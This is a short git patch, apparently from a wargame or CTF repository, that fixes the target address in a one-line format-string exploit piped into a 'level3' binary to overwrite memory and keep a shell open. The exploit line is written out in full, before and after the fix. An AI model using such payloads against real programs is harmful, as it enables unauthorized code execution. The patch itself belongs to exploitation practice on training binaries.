From 2100b61f00aaff40ef242cb71c98455feec475c0 Mon Sep 17 00:00:00 2001 From: 0x35c Date: Tue, 29 Apr 2025 12:00:21 +0200 Subject: [PATCH] fix: right address for the exploit --- level3/ressources/exploit | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/level3/ressources/exploit b/level3/ressources/exploit index 96c959c..cad212a 100644 --- a/level3/ressources/exploit +++ b/level3/ressources/exploit @@ -1 +1 @@ -(python -c 'print "\x8c\x98\x04\x80" + "A"*60 + "%4$n"'; cat) | ./level3 +(python -c 'print "\x8c\x98\x04\x08" + "A"*60 + "%4$n"'; cat) | ./level3